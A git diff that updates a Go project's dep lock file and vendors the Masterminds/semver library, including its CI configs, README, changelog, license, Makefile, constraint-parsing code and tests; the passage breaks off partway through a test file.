+[[projects]] + name = "github.com/Masterminds/sprig" + packages = ["."] + revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c" + version = "v2.15.0" + +[[projects]] + name = "github.com/Sirupsen/logrus" + packages = ["."] + revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc" + version = "v1.0.5" + +[[projects]] + name = "github.com/aokoli/goutils" + packages = ["."] + revision = "3391d3790d23d03408670993e957e8f408993c34" + version = "v1.0.1" + [[projects]] name = "github.com/boltdb/bolt" packages = ["."] @@ -13,6 +37,18 @@ revision = "48dbb65d7bd5c74ab50d53d04c949f20e3d14944" version = "1.0" +[[projects]] + name = "github.com/davecgh/go-spew" + packages = ["spew"] + revision = "346938d642f2ec3594ed81d874461961cd0faa76" + version = "v1.1.0" + +[[projects]] + name = "github.com/docker/docker" + packages = ["pkg/fileutils"] + revision = "092cba3727bb9b4a2f0e922cd6c0f93ea270e363" + version = "v1.13.1" + [[projects]] branch = "master" name = "github.com/elazarl/go-bindata-assetfs" @@ -37,6 +73,12 @@ revision = "629574ca2a5df945712d3079857300b5e4da0236" version = "v1.4.2" +[[projects]] + name = "github.com/go-ozzo/ozzo-validation" + packages = ["."] + revision = "85dcd8368eba387e65a03488b003e233994e87e9" + version = "v3.3" + [[projects]] name = "github.com/go-test/deep" packages = ["."] @@ -55,6 +97,12 @@ packages = ["query"] revision = "53e6ce116135b80d037921a7fdd5138cf32d7a8a" +[[projects]] + name = "github.com/google/uuid" + packages = ["."] + revision = "064e2069ce9c359c118179501254f67d7d37ba24" + version = "0.2" + [[projects]] name = "github.com/gorilla/context" packages = ["."] @@ -101,6 +149,18 @@ ] revision = "68e816d1c783414e79bc65b3994d9ab6b0a722ab" +[[projects]] + name = "github.com/huandu/xstrings" + packages = ["."] + revision = "2bf18b218c51864a87384c06996e40ff9dcff8e1" + version = "v1.0.0" + +[[projects]] + name = "github.com/imdario/mergo" + packages = ["."] + revision = "9316a62528ac99aaecb4e47eadd6dc8aa6533d58" + version = "v0.3.5" + [[projects]] name = "github.com/inconshreveable/mousetrap" packages = ["."] @@ -248,7 +308,11 @@ [[projects]] branch = "master" name = "golang.org/x/crypto" - packages = ["ssh/terminal"] + packages = [ + "pbkdf2", + "scrypt", + "ssh/terminal" + ] revision = "7d9177d70076375b9a59c8fde23d52d9c4a7ecd5" [[projects]] @@ -288,6 +352,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "6e38170b3ac78890d7f3af87171bc9ccf81083b5196342b2f5acea10125872bd" + inputs-digest = "148489fcbc8e0f37944adc0eb2f9f187995790c5107188e9f4bebb79f7989434" solver-name = "gps-cdcl" solver-version = 1 diff --git a/vendor/github.com/Masterminds/semver/.travis.yml b/vendor/github.com/Masterminds/semver/.travis.yml new file mode 100644 index 0000000000..3d9ebadb93 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/.travis.yml @@ -0,0 +1,27 @@ +language: go + +go: + - 1.6.x + - 1.7.x + - 1.8.x + - 1.9.x + - 1.10.x + - tip + +# Setting sudo access to false will let Travis CI use containers rather than +# VMs to run the tests. For more details see: +# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/ +# - http://docs.travis-ci.com/user/workers/standard-infrastructure/ +sudo: false + +script: + - make setup + - make test + +notifications: + webhooks: + urls: + - https://webhooks.gitter.im/e/06e3328629952dabe3e0 + on_success: change # options: [always|never|change] default: always + on_failure: always # options: [always|never|change] default: always + on_start: never # options: [always|never|change] default: always diff --git a/vendor/github.com/Masterminds/semver/CHANGELOG.md b/vendor/github.com/Masterminds/semver/CHANGELOG.md new file mode 100644 index 0000000000..b888e20aba --- /dev/null +++ b/vendor/github.com/Masterminds/semver/CHANGELOG.md @@ -0,0 +1,86 @@ +# 1.4.2 (2018-04-10) + +## Changed +- #72: Updated the docs to point to vert for a console appliaction +- #71: Update the docs on pre-release comparator handling + +## Fixed +- #70: Fix the handling of pre-releases and the 0.0.0 release edge case + +# 1.4.1 (2018-04-02) + +## Fixed +- Fixed #64: Fix pre-release precedence issue (thanks @uudashr) + +# 1.4.0 (2017-10-04) + +## Changed +- #61: Update NewVersion to parse ints with a 64bit int size (thanks @zknill) + +# 1.3.1 (2017-07-10) + +## Fixed +- Fixed #57: number comparisons in prerelease sometimes inaccurate + +# 1.3.0 (2017-05-02) + +## Added +- #45: Added json (un)marshaling support (thanks @mh-cbon) +- Stability marker. See https://masterminds.github.io/stability/ + +## Fixed +- #51: Fix handling of single digit tilde constraint (thanks @dgodd) + +## Changed +- #55: The godoc icon moved from png to svg + +# 1.2.3 (2017-04-03) + +## Fixed +- #46: Fixed 0.x.x and 0.0.x in constraints being treated as * + +# Release 1.2.2 (2016-12-13) + +## Fixed +- #34: Fixed issue where hyphen range was not working with pre-release parsing. + +# Release 1.2.1 (2016-11-28) + +## Fixed +- #24: Fixed edge case issue where constraint "> 0" does not handle "0.0.1-alpha" + properly. + +# Release 1.2.0 (2016-11-04) + +## Added +- #20: Added MustParse function for versions (thanks @adamreese) +- #15: Added increment methods on versions (thanks @mh-cbon) + +## Fixed +- Issue #21: Per the SemVer spec (section 9) a pre-release is unstable and + might not satisfy the intended compatibility. The change here ignores pre-releases + on constraint checks (e.g., ~ or ^) when a pre-release is not part of the + constraint. For example, `^1.2.3` will ignore pre-releases while + `^1.2.3-alpha` will include them. + +# Release 1.1.1 (2016-06-30) + +## Changed +- Issue #9: Speed up version comparison performance (thanks @sdboyer) +- Issue #8: Added benchmarks (thanks @sdboyer) +- Updated Go Report Card URL to new location +- Updated Readme to add code snippet formatting (thanks @mh-cbon) +- Updating tagging to v[SemVer] structure for compatibility with other tools. + +# Release 1.1.0 (2016-03-11) + +- Issue #2: Implemented validation to provide reasons a versions failed a + constraint. + +# Release 1.0.1 (2015-12-31) + +- Fixed #1: * constraint failing on valid versions. + +# Release 1.0.0 (2015-10-20) + +- Initial release diff --git a/vendor/github.com/Masterminds/semver/LICENSE.txt b/vendor/github.com/Masterminds/semver/LICENSE.txt new file mode 100644 index 0000000000..0da4aeadb0 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/LICENSE.txt @@ -0,0 +1,20 @@ +The Masterminds +Copyright (C) 2014-2015, Matt Butcher and Matt Farina + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/vendor/github.com/Masterminds/semver/Makefile b/vendor/github.com/Masterminds/semver/Makefile new file mode 100644 index 0000000000..a7a1b4e36d --- /dev/null +++ b/vendor/github.com/Masterminds/semver/Makefile @@ -0,0 +1,36 @@ +.PHONY: setup +setup: + go get -u gopkg.in/alecthomas/gometalinter.v1 + gometalinter.v1 --install + +.PHONY: test +test: validate lint + @echo "==> Running tests" + go test -v + +.PHONY: validate +validate: + @echo "==> Running static validations" + @gometalinter.v1 \ + --disable-all \ + --enable deadcode \ + --severity deadcode:error \ + --enable gofmt \ + --enable gosimple \ + --enable ineffassign \ + --enable misspell \ + --enable vet \ + --tests \ + --vendor \ + --deadline 60s \ + ./... || exit_code=1 + +.PHONY: lint +lint: + @echo "==> Running linters" + @gometalinter.v1 \ + --disable-all \ + --enable golint \ + --vendor \ + --deadline 60s \ + ./... || : diff --git a/vendor/github.com/Masterminds/semver/README.md b/vendor/github.com/Masterminds/semver/README.md new file mode 100644 index 0000000000..3e934ed71e --- /dev/null +++ b/vendor/github.com/Masterminds/semver/README.md @@ -0,0 +1,165 @@ +# SemVer + +The `semver` package provides the ability to work with [Semantic Versions](http://semver.org) in Go. Specifically it provides the ability to: + +* Parse semantic versions +* Sort semantic versions +* Check if a semantic version fits within a set of constraints +* Optionally work with a `v` prefix + +[![Stability: +Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html) +[![Build Status](https://travis-ci.org/Masterminds/semver.svg)](https://travis-ci.org/Masterminds/semver) [![Build status](https://ci.appveyor.com/api/projects/status/jfk66lib7hb985k8/branch/master?svg=true&passingText=windows%20build%20passing&failingText=windows%20build%20failing)](https://ci.appveyor.com/project/mattfarina/semver/branch/master) [![GoDoc](https://godoc.org/github.com/Masterminds/semver?status.svg)](https://godoc.org/github.com/Masterminds/semver) [![Go Report Card](https://goreportcard.com/badge/github.com/Masterminds/semver)](https://goreportcard.com/report/github.com/Masterminds/semver) + +## Parsing Semantic Versions + +To parse a semantic version use the `NewVersion` function. For example, + +```go + v, err := semver.NewVersion("1.2.3-beta.1+build345") +``` + +If there is an error the version wasn't parseable. The version object has methods +to get the parts of the version, compare it to other versions, convert the +version back into a string, and get the original string. For more details +please see the [documentation](https://godoc.org/github.com/Masterminds/semver). + +## Sorting Semantic Versions + +A set of versions can be sorted using the [`sort`](https://golang.org/pkg/sort/) +package from the standard library. For example, + +```go + raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",} + vs := make([]*semver.Version, len(raw)) + for i, r := range raw { + v, err := semver.NewVersion(r) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + vs[i] = v + } + + sort.Sort(semver.Collection(vs)) +``` + +## Checking Version Constraints + +Checking a version against version constraints is one of the most featureful +parts of the package. + +```go + c, err := semver.NewConstraint(">= 1.2.3") + if err != nil { + // Handle constraint not being parseable. + } + + v, _ := semver.NewVersion("1.3") + if err != nil { + // Handle version not being parseable. + } + // Check if the version meets the constraints. The a variable will be true. + a := c.Check(v) +``` + +## Basic Comparisons + +There are two elements to the comparisons. First, a comparison string is a list +of comma separated and comparisons. These are then separated by || separated or +comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a +comparison that's greater than or equal to 1.2 and less than 3.0.0 or is +greater than or equal to 4.2.3. + +The basic comparisons are: + +* `=`: equal (aliased to no operator) +* `!=`: not equal +* `>`: greater than +* `<`: less than +* `>=`: greater than or equal to +* `<=`: less than or equal to + +_Note, according to the Semantic Version specification pre-releases may not be +API compliant with their release counterpart. It says,_ + +> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._ + +_SemVer comparisons without a pre-release value will skip pre-release versions. +For example, `>1.2.3` will skip pre-releases when looking at a list of values +while `>1.2.3-alpha.1` will evaluate pre-releases._ + +## Hyphen Range Comparisons + +There are multiple methods to handle ranges and the first is hyphens ranges. +These look like: + +* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5` +* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5` + +## Wildcards In Comparisons + +The `x`, `X`, and `*` characters can be used as a wildcard character. This works +for all comparison operators. When used on the `=` operator it falls +back to the pack level comparison (see tilde below). For example, + +* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` +* `>= 1.2.x` is equivalent to `>= 1.2.0` +* `<= 2.x` is equivalent to `<= 3` +* `*` is equivalent to `>= 0.0.0` + +## Tilde Range Comparisons (Patch) + +The tilde (`~`) comparison operator is for patch level ranges when a minor +version is specified and major level changes when the minor number is missing. +For example, + +* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0` +* `~1` is equivalent to `>= 1, < 2` +* `~2.3` is equivalent to `>= 2.3, < 2.4` +* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` +* `~1.x` is equivalent to `>= 1, < 2` + +## Caret Range Comparisons (Major) + +The caret (`^`) comparison operator is for major level changes. This is useful +when comparisons of API versions as a major change is API breaking. For example, + +* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0` +* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0` +* `^2.3` is equivalent to `>= 2.3, < 3` +* `^2.x` is equivalent to `>= 2.0.0, < 3` + +# Validation + +In addition to testing a version against a constraint, a version can be validated +against a constraint. When validation fails a slice of errors containing why a +version didn't meet the constraint is returned. For example, + +```go + c, err := semver.NewConstraint("<= 1.2.3, >= 1.4") + if err != nil { + // Handle constraint not being parseable. + } + + v, _ := semver.NewVersion("1.3") + if err != nil { + // Handle version not being parseable. + } + + // Validate a version against a constraint. + a, msgs := c.Validate(v) + // a is false + for _, m := range msgs { + fmt.Println(m) + + // Loops over the errors which would read + // "1.3 is greater than 1.2.3" + // "1.3 is less than 1.4" + } +``` + +# Contribute + +If you find an issue or want to contribute please file an [issue](https://github.com/Masterminds/semver/issues) +or [create a pull request](https://github.com/Masterminds/semver/pulls). diff --git a/vendor/github.com/Masterminds/semver/appveyor.yml b/vendor/github.com/Masterminds/semver/appveyor.yml new file mode 100644 index 0000000000..b2778df15a --- /dev/null +++ b/vendor/github.com/Masterminds/semver/appveyor.yml @@ -0,0 +1,44 @@ +version: build-{build}.{branch} + +clone_folder: C:\gopath\src\github.com\Masterminds\semver +shallow_clone: true + +environment: + GOPATH: C:\gopath + +platform: + - x64 + +install: + - go version + - go env + - go get -u gopkg.in/alecthomas/gometalinter.v1 + - set PATH=%PATH%;%GOPATH%\bin + - gometalinter.v1.exe --install + +build_script: + - go install -v ./... + +test_script: + - "gometalinter.v1 \ + --disable-all \ + --enable deadcode \ + --severity deadcode:error \ + --enable gofmt \ + --enable gosimple \ + --enable ineffassign \ + --enable misspell \ + --enable vet \ + --tests \ + --vendor \ + --deadline 60s \ + ./... || exit_code=1" + - "gometalinter.v1 \ + --disable-all \ + --enable golint \ + --vendor \ + --deadline 60s \ + ./... || :" + - go test -v + +deploy: off diff --git a/vendor/github.com/Masterminds/semver/benchmark_test.go b/vendor/github.com/Masterminds/semver/benchmark_test.go new file mode 100644 index 0000000000..58a5c289f4 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/benchmark_test.go @@ -0,0 +1,157 @@ +package semver_test + +import ( + "testing" + + "github.com/Masterminds/semver" +) + +/* Constraint creation benchmarks */ + +func benchNewConstraint(c string, b *testing.B) { + for i := 0; i < b.N; i++ { + semver.NewConstraint(c) + } +} + +func BenchmarkNewConstraintUnary(b *testing.B) { + benchNewConstraint("=2.0", b) +} + +func BenchmarkNewConstraintTilde(b *testing.B) { + benchNewConstraint("~2.0.0", b) +} + +func BenchmarkNewConstraintCaret(b *testing.B) { + benchNewConstraint("^2.0.0", b) +} + +func BenchmarkNewConstraintWildcard(b *testing.B) { + benchNewConstraint("1.x", b) +} + +func BenchmarkNewConstraintRange(b *testing.B) { + benchNewConstraint(">=2.1.x, <3.1.0", b) +} + +func BenchmarkNewConstraintUnion(b *testing.B) { + benchNewConstraint("~2.0.0 || =3.1.0", b) +} + +/* Check benchmarks */ + +func benchCheckVersion(c, v string, b *testing.B) { + version, _ := semver.NewVersion(v) + constraint, _ := semver.NewConstraint(c) + + for i := 0; i < b.N; i++ { + constraint.Check(version) + } +} + +func BenchmarkCheckVersionUnary(b *testing.B) { + benchCheckVersion("=2.0", "2.0.0", b) +} + +func BenchmarkCheckVersionTilde(b *testing.B) { + benchCheckVersion("~2.0.0", "2.0.5", b) +} + +func BenchmarkCheckVersionCaret(b *testing.B) { + benchCheckVersion("^2.0.0", "2.1.0", b) +} + +func BenchmarkCheckVersionWildcard(b *testing.B) { + benchCheckVersion("1.x", "1.4.0", b) +} + +func BenchmarkCheckVersionRange(b *testing.B) { + benchCheckVersion(">=2.1.x, <3.1.0", "2.4.5", b) +} + +func BenchmarkCheckVersionUnion(b *testing.B) { + benchCheckVersion("~2.0.0 || =3.1.0", "3.1.0", b) +} + +func benchValidateVersion(c, v string, b *testing.B) { + version, _ := semver.NewVersion(v) + constraint, _ := semver.NewConstraint(c) + + for i := 0; i < b.N; i++ { + constraint.Validate(version) + } +} + +/* Validate benchmarks, including fails */ + +func BenchmarkValidateVersionUnary(b *testing.B) { + benchValidateVersion("=2.0", "2.0.0", b) +} + +func BenchmarkValidateVersionUnaryFail(b *testing.B) { + benchValidateVersion("=2.0", "2.0.1", b) +} + +func BenchmarkValidateVersionTilde(b *testing.B) { + benchValidateVersion("~2.0.0", "2.0.5", b) +} + +func BenchmarkValidateVersionTildeFail(b *testing.B) { + benchValidateVersion("~2.0.0", "1.0.5", b) +} + +func BenchmarkValidateVersionCaret(b *testing.B) { + benchValidateVersion("^2.0.0", "2.1.0", b) +} + +func BenchmarkValidateVersionCaretFail(b *testing.B) { + benchValidateVersion("^2.0.0", "4.1.0", b) +} + +func BenchmarkValidateVersionWildcard(b *testing.B) { + benchValidateVersion("1.x", "1.4.0", b) +} + +func BenchmarkValidateVersionWildcardFail(b *testing.B) { + benchValidateVersion("1.x", "2.4.0", b) +} + +func BenchmarkValidateVersionRange(b *testing.B) { + benchValidateVersion(">=2.1.x, <3.1.0", "2.4.5", b) +} + +func BenchmarkValidateVersionRangeFail(b *testing.B) { + benchValidateVersion(">=2.1.x, <3.1.0", "1.4.5", b) +} + +func BenchmarkValidateVersionUnion(b *testing.B) { + benchValidateVersion("~2.0.0 || =3.1.0", "3.1.0", b) +} + +func BenchmarkValidateVersionUnionFail(b *testing.B) { + benchValidateVersion("~2.0.0 || =3.1.0", "3.1.1", b) +} + +/* Version creation benchmarks */ + +func benchNewVersion(v string, b *testing.B) { + for i := 0; i < b.N; i++ { + semver.NewVersion(v) + } +} + +func BenchmarkNewVersionSimple(b *testing.B) { + benchNewVersion("1.0.0", b) +} + +func BenchmarkNewVersionPre(b *testing.B) { + benchNewVersion("1.0.0-alpha", b) +} + +func BenchmarkNewVersionMeta(b *testing.B) { + benchNewVersion("1.0.0+metadata", b) +} + +func BenchmarkNewVersionMetaDash(b *testing.B) { + benchNewVersion("1.0.0+metadata-dash", b) +} diff --git a/vendor/github.com/Masterminds/semver/collection.go b/vendor/github.com/Masterminds/semver/collection.go new file mode 100644 index 0000000000..a78235895f --- /dev/null +++ b/vendor/github.com/Masterminds/semver/collection.go @@ -0,0 +1,24 @@ +package semver + +// Collection is a collection of Version instances and implements the sort +// interface. See the sort package for more details. +// https://golang.org/pkg/sort/ +type Collection []*Version + +// Len returns the length of a collection. The number of Version instances +// on the slice. +func (c Collection) Len() int { + return len(c) +} + +// Less is needed for the sort interface to compare two Version objects on the +// slice. If checks if one is less than the other. +func (c Collection) Less(i, j int) bool { + return c[i].LessThan(c[j]) +} + +// Swap is needed for the sort interface to replace the Version objects +// at two different positions in the slice. +func (c Collection) Swap(i, j int) { + c[i], c[j] = c[j], c[i] +} diff --git a/vendor/github.com/Masterminds/semver/collection_test.go b/vendor/github.com/Masterminds/semver/collection_test.go new file mode 100644 index 0000000000..71b909c4e0 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/collection_test.go @@ -0,0 +1,46 @@ +package semver + +import ( + "reflect" + "sort" + "testing" +) + +func TestCollection(t *testing.T) { + raw := []string{ + "1.2.3", + "1.0", + "1.3", + "2", + "0.4.2", + } + + vs := make([]*Version, len(raw)) + for i, r := range raw { + v, err := NewVersion(r) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + vs[i] = v + } + + sort.Sort(Collection(vs)) + + e := []string{ + "0.4.2", + "1.0.0", + "1.2.3", + "1.3.0", + "2.0.0", + } + + a := make([]string, len(vs)) + for i, v := range vs { + a[i] = v.String() + } + + if !reflect.DeepEqual(a, e) { + t.Error("Sorting Collection failed") + } +} diff --git a/vendor/github.com/Masterminds/semver/constraints.go b/vendor/github.com/Masterminds/semver/constraints.go new file mode 100644 index 0000000000..a41a6a7a4a --- /dev/null +++ b/vendor/github.com/Masterminds/semver/constraints.go @@ -0,0 +1,426 @@ +package semver + +import ( + "errors" + "fmt" + "regexp" + "strings" +) + +// Constraints is one or more constraint that a semantic version can be +// checked against. +type Constraints struct { + constraints [][]*constraint +} + +// NewConstraint returns a Constraints instance that a Version instance can +// be checked against. If there is a parse error it will be returned. +func NewConstraint(c string) (*Constraints, error) { + + // Rewrite - ranges into a comparison operation. + c = rewriteRange(c) + + ors := strings.Split(c, "||") + or := make([][]*constraint, len(ors)) + for k, v := range ors { + cs := strings.Split(v, ",") + result := make([]*constraint, len(cs)) + for i, s := range cs { + pc, err := parseConstraint(s) + if err != nil { + return nil, err + } + + result[i] = pc + } + or[k] = result + } + + o := &Constraints{constraints: or} + return o, nil +} + +// Check tests if a version satisfies the constraints. +func (cs Constraints) Check(v *Version) bool { + // loop over the ORs and check the inner ANDs + for _, o := range cs.constraints { + joy := true + for _, c := range o { + if !c.check(v) { + joy = false + break + } + } + + if joy { + return true + } + } + + return false +} + +// Validate checks if a version satisfies a constraint. If not a slice of +// reasons for the failure are returned in addition to a bool. +func (cs Constraints) Validate(v *Version) (bool, []error) { + // loop over the ORs and check the inner ANDs + var e []error + for _, o := range cs.constraints { + joy := true + for _, c := range o { + if !c.check(v) { + em := fmt.Errorf(c.msg, v, c.orig) + e = append(e, em) + joy = false + } + } + + if joy { + return true, []error{} + } + } + + return false, e +} + +var constraintOps map[string]cfunc +var constraintMsg map[string]string +var constraintRegex *regexp.Regexp + +func init() { + constraintOps = map[string]cfunc{ + "": constraintTildeOrEqual, + "=": constraintTildeOrEqual, + "!=": constraintNotEqual, + ">": constraintGreaterThan, + "<": constraintLessThan, + ">=": constraintGreaterThanEqual, + "=>": constraintGreaterThanEqual, + "<=": constraintLessThanEqual, + "=<": constraintLessThanEqual, + "~": constraintTilde, + "~>": constraintTilde, + "^": constraintCaret, + } + + constraintMsg = map[string]string{ + "": "%s is not equal to %s", + "=": "%s is not equal to %s", + "!=": "%s is equal to %s", + ">": "%s is less than or equal to %s", + "<": "%s is greater than or equal to %s", + ">=": "%s is less than %s", + "=>": "%s is less than %s", + "<=": "%s is greater than %s", + "=<": "%s is greater than %s", + "~": "%s does not have same major and minor version as %s", + "~>": "%s does not have same major and minor version as %s", + "^": "%s does not have same major version as %s", + } + + ops := make([]string, 0, len(constraintOps)) + for k := range constraintOps { + ops = append(ops, regexp.QuoteMeta(k)) + } + + constraintRegex = regexp.MustCompile(fmt.Sprintf( + `^\s*(%s)\s*(%s)\s*$`, + strings.Join(ops, "|"), + cvRegex)) + + constraintRangeRegex = regexp.MustCompile(fmt.Sprintf( + `\s*(%s)\s+-\s+(%s)\s*`, + cvRegex, cvRegex)) +} + +// An individual constraint +type constraint struct { + // The callback function for the restraint. It performs the logic for + // the constraint. + function cfunc + + msg string + + // The version used in the constraint check. For example, if a constraint + // is '<= 2.0.0' the con a version instance representing 2.0.0. + con *Version + + // The original parsed version (e.g., 4.x from != 4.x) + orig string + + // When an x is used as part of the version (e.g., 1.x) + minorDirty bool + dirty bool + patchDirty bool +} + +// Check if a version meets the constraint +func (c *constraint) check(v *Version) bool { + return c.function(v, c) +} + +type cfunc func(v *Version, c *constraint) bool + +func parseConstraint(c string) (*constraint, error) { + m := constraintRegex.FindStringSubmatch(c) + if m == nil { + return nil, fmt.Errorf("improper constraint: %s", c) + } + + ver := m[2] + orig := ver + minorDirty := false + patchDirty := false + dirty := false + if isX(m[3]) { + ver = "0.0.0" + dirty = true + } else if isX(strings.TrimPrefix(m[4], ".")) || m[4] == "" { + minorDirty = true + dirty = true + ver = fmt.Sprintf("%s.0.0%s", m[3], m[6]) + } else if isX(strings.TrimPrefix(m[5], ".")) { + dirty = true + patchDirty = true + ver = fmt.Sprintf("%s%s.0%s", m[3], m[4], m[6]) + } + + con, err := NewVersion(ver) + if err != nil { + + // The constraintRegex should catch any regex parsing errors. So, + // we should never get here. + return nil, errors.New("constraint Parser Error") + } + + cs := &constraint{ + function: constraintOps[m[1]], + msg: constraintMsg[m[1]], + con: con, + orig: orig, + minorDirty: minorDirty, + patchDirty: patchDirty, + dirty: dirty, + } + return cs, nil +} + +// Constraint functions +func constraintNotEqual(v *Version, c *constraint) bool { + if c.dirty { + + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if c.con.Major() != v.Major() { + return true + } + if c.con.Minor() != v.Minor() && !c.minorDirty { + return true + } else if c.minorDirty { + return false + } + + return false + } + + return !v.Equal(c.con) +} + +func constraintGreaterThan(v *Version, c *constraint) bool { + + // An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease + // exists. This that case. + if !isNonZero(c.con) && isNonZero(v) { + return true + } + + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + return v.Compare(c.con) == 1 +} + +func constraintLessThan(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if !c.dirty { + return v.Compare(c.con) < 0 + } + + if v.Major() > c.con.Major() { + return false + } else if v.Minor() > c.con.Minor() && !c.minorDirty { + return false + } + + return true +} + +func constraintGreaterThanEqual(v *Version, c *constraint) bool { + // An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease + // exists. This that case. + if !isNonZero(c.con) && isNonZero(v) { + return true + } + + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + return v.Compare(c.con) >= 0 +} + +func constraintLessThanEqual(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if !c.dirty { + return v.Compare(c.con) <= 0 + } + + if v.Major() > c.con.Major() { + return false + } else if v.Minor() > c.con.Minor() && !c.minorDirty { + return false + } + + return true +} + +// ~*, ~>* --> >= 0.0.0 (any) +// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0, <3.0.0 +// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0, <2.1.0 +// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0, <1.3.0 +// ~1.2.3, ~>1.2.3 --> >=1.2.3, <1.3.0 +// ~1.2.0, ~>1.2.0 --> >=1.2.0, <1.3.0 +func constraintTilde(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if v.LessThan(c.con) { + return false + } + + // ~0.0.0 is a special case where all constraints are accepted. It's + // equivalent to >= 0.0.0. + if c.con.Major() == 0 && c.con.Minor() == 0 && c.con.Patch() == 0 && + !c.minorDirty && !c.patchDirty { + return true + } + + if v.Major() != c.con.Major() { + return false + } + + if v.Minor() != c.con.Minor() && !c.minorDirty { + return false + } + + return true +} + +// When there is a .x (dirty) status it automatically opts in to ~. Otherwise +// it's a straight = +func constraintTildeOrEqual(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if c.dirty { + c.msg = constraintMsg["~"] + return constraintTilde(v, c) + } + + return v.Equal(c.con) +} + +// ^* --> (any) +// ^2, ^2.x, ^2.x.x --> >=2.0.0, <3.0.0 +// ^2.0, ^2.0.x --> >=2.0.0, <3.0.0 +// ^1.2, ^1.2.x --> >=1.2.0, <2.0.0 +// ^1.2.3 --> >=1.2.3, <2.0.0 +// ^1.2.0 --> >=1.2.0, <2.0.0 +func constraintCaret(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if v.LessThan(c.con) { + return false + } + + if v.Major() != c.con.Major() { + return false + } + + return true +} + +var constraintRangeRegex *regexp.Regexp + +const cvRegex string = `v?([0-9|x|X|\*]+)(\.[0-9|x|X|\*]+)?(\.[0-9|x|X|\*]+)?` + + `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + + `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + +func isX(x string) bool { + switch x { + case "x", "*", "X": + return true + default: + return false + } +} + +func rewriteRange(i string) string { + m := constraintRangeRegex.FindAllStringSubmatch(i, -1) + if m == nil { + return i + } + o := i + for _, v := range m { + t := fmt.Sprintf(">= %s, <= %s", v[1], v[11]) + o = strings.Replace(o, v[0], t, 1) + } + + return o +} + +// Detect if a version is not zero (0.0.0) +func isNonZero(v *Version) bool { + if v.Major() != 0 || v.Minor() != 0 || v.Patch() != 0 || v.Prerelease() != "" { + return true + } + + return false +} diff --git a/vendor/github.com/Masterminds/semver/constraints_test.go b/vendor/github.com/Masterminds/semver/constraints_test.go new file mode 100644 index 0000000000..bf52c90bd2 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/constraints_test.go @@ -0,0 +1,465 @@ +package semver + +import ( + "reflect" + "testing" +) + +func TestParseConstraint(t *testing.T) { + tests := []struct { + in string + f cfunc + v string + err bool + }{ + {">= 1.2", constraintGreaterThanEqual, "1.2.0", false}, + {"1.0", constraintTildeOrEqual, 